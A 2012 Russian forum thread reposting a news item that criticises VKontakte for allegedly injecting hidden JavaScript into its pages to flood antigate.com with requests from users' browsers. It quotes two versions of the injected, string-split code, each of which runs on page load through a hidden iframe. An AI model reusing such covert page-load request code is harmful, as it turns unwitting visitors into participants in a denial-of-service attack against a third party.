Вернуться   Форум Пустоты.нет - приятное общение ! > Новости

Отправка SMS по России и Украине.

.
Ответ
 
Опции темы Опции просмотра
Старый 03.05.2012, 21:53   #1
Owner
 
Аватар для FuseR
 
male
Регистрация: 29.09.2006
Адрес: Украина
Сообщений: 2,342
Провел(а) на форуме:
3 мес 0 нед 3 д
Репутация: 223 Добавить отзыв для FuseR
Смущение ВКонтакте ДДОСил antigate

26 апреля 2012 юзер с сайта roem обнаружил что на страницах социальной сети ВКонтакте появился код, который без ведома пользователя шлет запросы на сайт antigate.com. Зачем это? Чтобы вывести сайт antigate из строя множеством запросов, это называется DDOS-атакой. Пользователи ВКонтакте поневоле стали вовлечены в уголовно наказуемое преступление, а их компьютеры были подвергнуты возможности заражения вирусами.

Выглядит это вот так:
PHP код:
function _test() {
  var 
fr=utilsNode.appendChild(ce('iframe')),d=fr.contentWindow.document;d.open();d.write('<script>this.location="http://ant'+'iga'+'te.com/i'+'n.php?'+'firs'+'t_an'+'d_la'+'st_wa'+'rnin'+'g=o'+'n";</sc'+'ript>');setTimeout(re.pbind(fr),1000);
}
<
body onresize="onBodyResize()" class="is_rtl font_default" onload="_test()"
Вообще, при такой ламерской организации атаки, antigate мог бы продать весь трафик в какой-нибудь ботнет, и неплохо заработать. А все пользователи ВКонтакте, которые не ставят обновления на свои компьютеры, могли бы стать частью ботнета. Но antigate поступил более прикольно — он сделал редирект на порносайт из iframe В итоге, ничего не подозревающий пользователь ВКонтакте, открывая vk.com, оказывался на порносайте.

После этого код убрали, а затем установили новый код, через который уже тяжело причинить вред пользователю ВКонтакте:
PHP код:
function _test(){var fr=utilsNode.appendChild(ce('iframe')),d=fr.contentWindow.document;d.open();d.write('<script>var XHR=window.XDomainRequest||window.XMLHttpRequest,xhr=new XHR();xhr.open("POST","http://ant'+'iga'+'te.com/i'+'n.php",true);xhr.setRequestHeader("Content-Type","application/x-www-form-urlencoded");var tmp2="e8532291e45ec27a85e87692e070da98";for(i=0;i<5;++i)tmp2+=tmp2;xhr.send("method=base64&key=fb856f0ab752e3894fbdb3c4613ca924&body="+tmp2+"&ext=jpg");</sc'+'ript>');d.close();setTimeout(re.pbind(fr),1000);} 
Не нужно говорить, наверное, что если бы Facebook перенаправлял своих пользователей на порносайт хотя бы несколько секунд, то это событие получило бы большую огласку. У нас же в новостях пока пусто.

Можно долго спорить о том что antigate помогает спамерам, и заддосить его это хорошо. Но дело не в том какой сайт подвергся атаке, а в том что в цивилизованной (а мы ведь хотим чтобы Россия была цивилизованной страной?) крупнейшая социальная сеть, не уведомляя своих пользователей, во-первых вовлекает пользователей в уголовно наказуемое преступление, во-вторых подвергает риску заражения вирусами их компьютеры, и в-третьих расходует их траффик, за который пользователи платят деньги. На лицо грубое применение силы в стиле «братки из 90-х», что просто недопустимо в цивилизованном обществе.

источник: paulov.ru
FuseR вне форума   Ответить с цитированием

Интересные новости (не создавайте темы из этих новостей!!!)

Бесплатные знакомства в России, Украине.

Покупаешь? Возвращай Кэшбэк за покупки.

Старый 03.05.2012, 22:29   #2
Свой
 
Аватар для Анатолий134
 
male
Регистрация: 14.01.2012
Адрес: Керчь
Сообщений: 197
Провел(а) на форуме:
4 д 6 ч 47 мин
Репутация: 20 Добавить отзыв для Анатолий134
По умолчанию Re: ВКонтакте ДДОСил antigate

Вот честно говоря, я был бы рад если бы сайт Вконтакте накрылся.
Это мое мнение.
__________________
Иногда, даже свобода может быть проклятием...
Анатолий134 вне форума   Ответить с цитированием

Ответ



Опции темы
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.


Часовой пояс GMT +3, время: 23:23.


© Форум "Пустоты.нет" - общение и знакомства 2006-2024, Мобильный контент
Работает на vBulletin® версия 3.9.15
Copyright ©2000 - 2012, Jelsoft Enterprises Ltd.
Перевод:zCarot. Стиль: vBSkins. Dir

Top100
Страница сгенерирована за 0.08783 секунд с 11 запросами